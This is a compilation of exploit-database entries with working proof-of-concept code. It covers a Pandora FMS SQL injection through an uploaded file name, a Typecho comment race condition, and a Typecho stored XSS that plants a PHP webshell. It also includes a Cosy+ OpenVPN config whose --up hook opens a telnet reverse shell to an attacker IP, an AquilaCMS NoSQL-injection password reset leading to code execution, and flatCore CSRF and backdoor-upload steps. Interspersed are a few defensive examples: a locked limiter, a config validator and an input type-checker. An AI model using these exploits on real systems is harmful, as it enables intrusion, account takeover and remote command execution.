    res = session.get(url)
    csrf = retrieve_csrftoken(res.text)
    url += '?login=1'
    payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
    res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
    if 'User is blocked' in res.text:
        print("Login Failed!")
        exit(1)


def exploit(session, url, imagepath, query):
    url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
    name = random_id(10)
    # The injection travels in the uploaded file name
    payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
    payload = payload.replace(' ', '\t')
    files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
    # Create a reference to the original _make_request method
    urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
    # Replace the _make_request method with the custom_make_request function
    urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
    res = session.post(url1, files=files, data={'action': 'save', 'name': name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
    if 'Created successfully' not in res.text:
        print("Failed to create a visual console!")
        exit(1)
    url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
    res = session.get(url2)
    x = re.search('(?:<a href=".*">)' + name, res.text)
    match = x.group()
    url3 = match.lstrip("<a href=")
    url3 = url3.split('"')[1]
    url3 = url3.split("?")[1]
    url3 = html.unescape(url3)
    url4 = url + "?" + url3
    res = session.get(url4)
    # The query result is reflected in the console's backgroundColor property
    x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
    match = x.group()
    output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
    output = output.split('","backgroundImage')[0]
    print("Query output: {}".format(output))


def retrieve_csrftoken(response):
    x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response)
    match = x.group()
    csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"')
    print("CSRF: {}".format(csrf))
    return csrf


def random_id(length):
    chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(random.choice(chars) for _ in range(length))


def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
    # Undo the percent-encoding of the tabs in the file name before the request goes out
    body = httplib_request_kw['body']
    if body:
        body = body.replace(b"%09", b"\t" * 3)
        httplib_request_kw['body'] = body
    return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("-t", "--target", required=True, help="Target URI")
    ap.add_argument("-u", "--username", required=True, help="Username")
    ap.add_argument("-p", "--password", required=True, help="Password")
    ap.add_argument("-i", "--image", required=True, help="Image path")
    ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
    ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
    args = vars(ap.parse_args())
    session = requests.Session()
    url = args['target']
    if 'pandora_console' not in url:
        if not url.endswith('/'):
            url += '/'
        url += 'pandora_console/'
    headers['Origin'] = args['target']
    headers['Referer'] = args['target']
    session.headers.update(headers)
    proxies = {}
    if args['proxy'] is not None:
        if 'https' in args['proxy']:
            proxies['https'] = args['proxy']
        else:
            proxies['http'] = args['proxy']
        session.proxies.update(proxies)
    login(session, url, args['username'], args['password'])
    exploit(session, url, args['image'], args['query'])


if __name__ == '__main__':
    main()
# Exploit Title: Typecho 1.3.0 - Race Condition
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35539
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
	"sync/atomic"
	"time"

	"github.com/robertkrimen/otto"
)

var (
	c                    int32 = 0
	commentsPostInterval int64 = 60
	maxThreads           int   = 1000
	wg                   sync.WaitGroup
	userAgent            string       = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
	client               *http.Client = &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
)

// getJSFunction fetches the post page and cuts out the inline JavaScript that computes the comment form token.
func getJSFunction(u string) string {
	req, err := http.NewRequest("GET", u, nil)
	if err != nil {
		fmt.Println("[X] Error creating initial request:", err)
		return ""
	}
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending initial request:", err)
		return ""
	}
	buf := new(bytes.Buffer)
	buf.ReadFrom(resp.Body)
	body := buf.String()
	if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
		fmt.Println("[X] Error finding JavaScript function")
		return ""
	}
	jsFunction := strings.Split(body, "input.value = (")[1]
	jsFunction = strings.Split(jsFunction, ")();;")[0]
	return jsFunction
}

// executeJavaScript evaluates the extracted function in an embedded JS interpreter and returns its result.
func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
	vm := otto.New()
	_, err := vm.Run(jsFunctionBody)
	if err != nil {
		fmt.Println("[X] Error executing JavaScript function:", err)
		return ""
	}
	result, err := vm.Call(jsFunctionName, nil)
	if err != nil {
		fmt.Println("[X] Error calling JavaScript function:", err)
		return ""
	}
	returnValue, err := result.ToString()
	if err != nil {
		fmt.Println("[X] Error converting JavaScript result to string:", err)
		return ""
	}
	return returnValue
}

// spamComments fires a burst of concurrent comment requests inside the same interval window, then waits for the next one.
func spamComments(u string, formToken string) {
	timestamp := time.Now().Unix()
	for {
		i := 0
		for time.Now().Unix() < timestamp-1 {
			time.Sleep(250 * time.Millisecond)
			fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1)
		}
		fmt.Printf("\n")
		for time.Now().Unix() < timestamp+2 {
			if i < maxThreads {
				wg.Add(1)
				go spamRequest(u, formToken, i)
				i++
			}
		}
		wg.Wait()
		fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
		timestamp = time.Now().Unix() + commentsPostInterval
	}
}

func spamRequest(u string, formToken string, i int) {
	fmt.Printf("\r[*] Spamming comment request %d ", i)
	defer wg.Done()
	formData := url.Values{}
	formData.Set("_", formToken)
	formData.Set("author", fmt.Sprintf("user_%d", i))
	formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
	formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
	req, err := http.NewRequest("POST", u+"comment", nil)
	if err != nil {
		return
	}
	req.Header.Set("Referer", u)
	req.Header.Set("User-Agent", userAgent)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
	req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
	resp, err := client.Do(req)
	if err != nil {
		return
	}
	if resp.StatusCode == 302 {
		atomic.AddInt32(&c, 1)
	}
	defer resp.Body.Close()
}

func main() {
	if len(os.Args) != 2 {
		fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
		return
	}
	fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
	targetUrl := os.Args[1]
	fmt.Println("[+] Spam target:", targetUrl)
	fmt.Println("[*] Getting JavaScript function to calculate form token...")
	jsFunction := getJSFunction(targetUrl)
	if jsFunction == "" {
		fmt.Println("[-] Could not get JavaScript function, exiting...")
		return
	}
	fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
	formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
	if formToken == "" {
		fmt.Println("[-] Could not get form token, exiting...")
		return
	}
	fmt.Printf("[+] Form token: %s", formToken)
	spamComments(targetUrl, formToken)
}
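The exploit wins because the comment-interval check reads the last post time and the new comment is stored afterwards, so up to maxThreads requests landing in the same window all pass. The added example below (not Typecho's code) contrasts that check-then-act limiter with one whose check and update form a single critical section; the 10 ms simulated database delay only makes the window visible.

```python
import threading
import time

COMMENTS_POST_INTERVAL = 60  # seconds between comments from one client, as in the exploit


class RacyCommentLimiter:
    """Check-then-act without synchronisation: every request that reads
    last_post before the first one persists its timestamp is accepted."""

    def __init__(self):
        self.last_post = {}  # client key (e.g. source IP) -> time of last accepted comment

    def _persist(self, client, now):
        time.sleep(0.01)  # simulated database round trip before the timestamp lands
        self.last_post[client] = now

    def try_post(self, client):
        now = time.monotonic()
        last = self.last_post.get(client)
        if last is not None and now - last < COMMENTS_POST_INTERVAL:
            return False
        self._persist(client, now)
        return True


class AtomicCommentLimiter(RacyCommentLimiter):
    """Same policy, but the check and the update run as one critical section,
    so a burst of concurrent requests yields exactly one accepted comment."""

    def __init__(self):
        super().__init__()
        self.lock = threading.Lock()

    def try_post(self, client):
        with self.lock:
            return super().try_post(client)


def flood(limiter, client, n):
    """Fire n concurrent comment attempts for one client; return how many were accepted."""
    accepted = 0
    count_lock = threading.Lock()

    def worker():
        nonlocal accepted
        if limiter.try_post(client):
            with count_lock:
                accepted += 1

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return accepted


if __name__ == "__main__":
    print("racy limiter accepted:", flood(RacyCommentLimiter(), "203.0.113.7", 50))    # many
    print("atomic limiter accepted:", flood(AtomicCommentLimiter(), "203.0.113.7", 50))  # 1
```

With several PHP-FPM workers a process-local lock is not enough; the equivalent there is a conditional write in the database (update the timestamp only where the stored one is older than the interval, and accept the comment only if a row was affected).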
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import sys
import time


def configcreator(file_path):
    # Writes an OpenVPN client profile whose --up hook runs a shell command;
    # {attacker_ip} is a placeholder to fill in before uploading the profile
    with open(file_path, 'w') as f:
        f.write("""client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"'
script-security 2
""")


def l3st(port):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', port))
    server_socket.listen(1)
    print(f" - --> Listening_0n_port {port}")
    client_socket, _ = server_socket.accept()
    print(" - --> Received")
    while True:
        data = client_socket.recv(1024)
        if not data:
            break
        print(data.decode())
    client_socket.close()
    server_socket.close()


if __name__ == "__main__":
    IP = '127.0.0.1'
    config = '/path/to/malicious_config.ovpn'
    port = 5000
    # The listener runs in a child process; this assumes the script is saved as main.py
    listener_process = subprocess.Popen([sys.executable, '-c', f'from main import l3st; l3st({port})'])
    time.sleep(2)
    configcreator(config)
    print(f" - --> config_created {config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
parameters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
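The server-side check that is missing here is a validator that refuses any uploaded profile carrying a script-executing directive before it reaches OpenVPN. The example below is added for illustration and is not the vendor's code; the directive denylist is taken from the OpenVPN manual (the advisory names only --up and --down), and the sample profiles are constructed.

```python
import shlex

# OpenVPN directives that run an external program or relax script policy
# (denylist assumed from the OpenVPN manual; the advisory names --up and --down).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify", "script-security", "plugin",
}

UNPARSEABLE = "<unparseable>"


def iter_directives(config_text):
    """Yield (directive, args) for each config line. Accepts the 'name' and
    '--name' forms, skips comments and the bodies of inline <ca>..</ca> style
    blocks, and reports lines shlex cannot parse as UNPARSEABLE."""
    in_block = None
    for raw in config_text.splitlines():
        line = raw.strip()
        if in_block:
            if line == f"</{in_block}>":
                in_block = None
            continue
        if line.startswith("<") and line.endswith(">") and not line.startswith("</"):
            in_block = line[1:-1]
            continue
        if not line or line[0] in "#;":
            continue
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:                      # unbalanced quotes: never let it through
            yield UNPARSEABLE, [line]
            continue
        if tokens:
            yield tokens[0].lstrip("-").lower(), tokens[1:]


def find_script_directives(config_text):
    """Return every (directive, args) pair that must block the upload."""
    return [(d, a) for d, a in iter_directives(config_text)
            if d in SCRIPT_DIRECTIVES or d == UNPARSEABLE]


def is_upload_acceptable(config_text):
    return not find_script_directives(config_text)


# Constructed sample profiles.
BENIGN_PROFILE = """\
client
dev tun
proto tcp
remote vpn.example.test 1194   # gateway
<ca>
PLACEHOLDER-CERT-BODY
</ca>
"""

REJECTED_PROFILE = """\
client
dev tun
persist-tun
proto tcp
--up '/bin/sh -c "id"'
script-security 2
"""

if __name__ == "__main__":
    print(is_upload_acceptable(BENIGN_PROFILE))          # True
    print(find_script_directives(REJECTED_PROFILE))      # [('up', [...]), ('script-security', ['2'])]
```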
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )


def get_user_emails():
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
    emails_found = []
    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []
        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)
                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True
            if not found:
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")
    return emails_found


def reset_password(email):
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]
    return None


def create_plugin(plugin_name):
    payload = textwrap.dedent(
        f"""
        const {{ exec }} = require("child_process");
        /**
         * This function is called when the plugin is deactivated or when we delete it
         */
        module.exports = async function (resolve, reject) {{
            try {{
                exec("{args.command}");
                return resolve();
            }} catch (error) {{}}
        }};
        """
    ).strip()
    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )
    plugin.seek(0)
    return plugin


def rce(emails):
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return
    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)
    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
    plugin_id = None
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break
    if plugin_id is None:
        print("[-] Plugin not found")
        return
    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main():
    print("[*] Retrieve email addresses")
    emails = get_user_emails()
    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)
    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()
    main()
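Both weaknesses the PoC above relies on are the same class of bug: a JSON field that should be a plain string is accepted as a regex (`"^a.*"` in the user-exists check) or as a MongoDB operator object (`{"$ne": null}` in the reset-token check). The validator below is an added example, not AquilaCMS code, showing how a request handler would type-check those fields before building the database filter; the filter shapes and the sample address are assumptions.

```python
import re


class BadRequest(ValueError):
    """Raised when a JSON body field is not the plain scalar the API expects."""


def require_string(body, field, max_len=254):
    """Return body[field] only if it is a non-empty string. A JSON object such
    as {"$ne": null} or a list is rejected here, so an operator supplied by the
    client can never be spliced into the MongoDB filter."""
    value = body.get(field) if isinstance(body, dict) else None
    if not isinstance(value, str) or not value or len(value) > max_len:
        raise BadRequest(f"{field} must be a non-empty string")
    return value


def build_reset_filter(body):
    """Filter for the reset-password step: the token is matched with $eq only."""
    return {"token": {"$eq": require_string(body, "token")}}


def build_email_filter(body):
    """Filter for the user-exists check: the address is regex-escaped before the
    case-insensitive lookup, so "^a.*" can only match that literal string."""
    email = require_string(body, "email")
    return {"email": {"$regex": f"^{re.escape(email)}$", "$options": "i"}}


def email_lookup_matches(body, stored_email):
    """Offline stand-in for the database: would the filter hit stored_email?"""
    pattern = build_email_filter(body)["email"]["$regex"]
    return re.fullmatch(pattern, stored_email, flags=re.IGNORECASE) is not None


def rejects(builder, body):
    """True when builder refuses the body with BadRequest."""
    try:
        builder(body)
    except BadRequest:
        return True
    return False
```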
# Exploit Title: Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35540
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main

import (
	"bufio"
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

var (
	postTitle string = "Reflected XSS PoC"
	postText  string = "Hey admin! Look at the draft of this blog post, can I publish it?"
	userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
	client    *http.Client = &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
)

func getEditUrl(u string, cookies string) string {
	req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
	if err != nil {
		fmt.Println("[X] Error creating initial request:", err)
		return ""
	}
	req.Header.Set("Cookie", cookies)
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending initial request:", err)
		return ""
	}
	buf := new(bytes.Buffer)
	buf.ReadFrom(resp.Body)
	body := buf.String()
	if !strings.Contains(body, "<form action=\"") {
		fmt.Println("[X] Error finding post edit URL")
		return ""
	}
	editUrl := strings.Split(body, "<form action=\"")[1]
	editUrl = strings.Split(editUrl, "\"")[0]
	return editUrl
}

func generateRandomBytes() string {
	bytes := make([]byte, 64)
	rand.Read(bytes)
	return fmt.Sprintf("%x", sha256.Sum256(bytes))
}

func getJsCode(password string) string {
	phpPayload := `
header("X-Random-Token: " . md5(uniqid()));
if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
	if (isset($_POST["action"])) {
		system($_POST["action"]);
		exit;
	}
}
`
	phpPayload = fmt.Sprintf(phpPayload, password)
	jsPayload := `
var i = document.createElement('iframe');
i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
i.style.display = 'none';
document.body.appendChild(i);
setTimeout(() => {
	var textarea = i.contentWindow.document.getElementById('content');
	if (textarea.value.includes(payload))
		return;
	textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
	var form = i.contentWindow.document.getElementById('theme').submit();
}, 200);
`
	return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
}

func generatePayload(jsCode string) string {
	remainder := len(jsCode) % 3
	if remainder != 0 {
		jsCode += strings.Repeat(" ", 3-remainder)
	}
	jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
	return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
}

func createPost(u string, cookies string, payload string) string {
	formData := url.Values{}
	formData.Set("title", postTitle)
	formData.Set("text", payload+"\n"+postText)
	formData.Set("do", "save")
	formData.Set("markdown", "1")
	formData.Set("category%5B%5D", "1")
	formData.Set("allowComment", "1")
	formData.Set("allowPing", "1")
	formData.Set("allowFeed", "1")
	formData.Set("dst", "60")
	formData.Set("timezone", "7200")
	req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
	if err != nil {
		fmt.Println("[X] Error creating malicious post creation request:", err)
		return ""
	}
	req.Header.Set("Cookie", cookies)
	req.Header.Set("User-Agent", userAgent)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
	req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending malicious post creation request:", err)
		return ""
	}
	defer resp.Body.Close()
	return resp.Header.Get("Location")
}

func checkInjected(u string) bool {
	req, err := http.NewRequest("HEAD", u, nil)
	if err != nil {
		return false
	}
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		return false
	}
	return resp.Header.Get("X-Random-Token") != ""
}

func readInput() string {
	scanner := bufio.NewScanner(os.Stdin)
	if scanner.Scan() {
		return scanner.Text()
	}
	return ""
}

func interactiveShell(u string, password string) {
	for {
		fmt.Print("$ ")
		cmd := readInput()
		formData := url.Values{}
		formData.Set("CSRFToken", password)
		formData.Set("action", cmd)
		req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
		if err != nil {
			fmt.Println("[X] Error creating shell request:", err)
			continue
		}
		req.Header.Set("User-Agent", userAgent)
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
		resp, err := client.Do(req)
		if err != nil {
			fmt.Println("[X] Error sending shell request:", err)
			continue
		}
		buf := new(bytes.Buffer)
		buf.ReadFrom(resp.Body)
		body := buf.String()
		fmt.Println(body)
	}
}

func main() {
	if len(os.Args) != 3 {
		fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
		os.Exit(1)
	}
	fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
	targetUrl := os.Args[1]
	cookies := os.Args[2]
	fmt.Println("[*] Getting post edit URL with CSRF token...")
	editUrl := getEditUrl(targetUrl, cookies)
	if editUrl == "" {
		fmt.Println("[-] Could not get post edit URL, exiting...")
		return
	}
	fmt.Println("[+] Edit URL:", editUrl)
	password := generateRandomBytes()
	fmt.Println("[+] Generated password to access the webshell: ", password)
	fmt.Println("[*] Generating JavaScript code to inject webshell...")
	jsCode := getJsCode(password)
	payload := generatePayload(jsCode)
	fmt.Println("[*] Creating malicious post...")
	postUrl := createPost(editUrl, cookies, payload)
	if postUrl == "" || postUrl == "/" {
		fmt.Println("[-] Could not create malicious post, exiting...")
		return
	}
	previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
	fmt.Println("[+] Malicious post created successfully!")
	fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
	fmt.Println("[*] Waiting for the admin to visit the preview URL...")
	for !checkInjected(targetUrl) {
		time.Sleep(1 * time.Second)
	}
	fmt.Println("[+] Webshell injected successfully!")
	fmt.Println("[+] Enjoy your shell ;)\n")
	interactiveShell(targetUrl, password)
}
# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: d3a5168
# Tested on: Ubuntu Windows
# CVE : CVE-2019-13961
PoC:
<!DOCTYPE html>
<html>
  <head>
    <title>CSRF PoC</title>
  </head>
  <body>
    <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="upload_destination" value="../content/files">
      <input type="hidden" name="w" value="800">
      <input type="hidden" name="h" value="600">
      <input type="hidden" name="fz" value="1000">
      <input type="hidden" name="unchanged" value="yes">
      <input type="file" name="file" value="test.php">
      <input type="submit" value="Upload">
    </form>
  </body>
</html>
[Replace Your Domain Name]
# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC:
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream
<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"
../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"
<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
PoC
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability
# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
# Step 2: Upload a malicious PHP file using the file upload feature
# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php
# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
-H "Content-Type: multipart/form-data" \
-F "file=@shell.php" \
-F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
-F "upload_destination=../content/files" \
-F "file_mode=overwrite" \
-b "PHPSESSID=YOUR_SESSION_ID_HERE"
# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
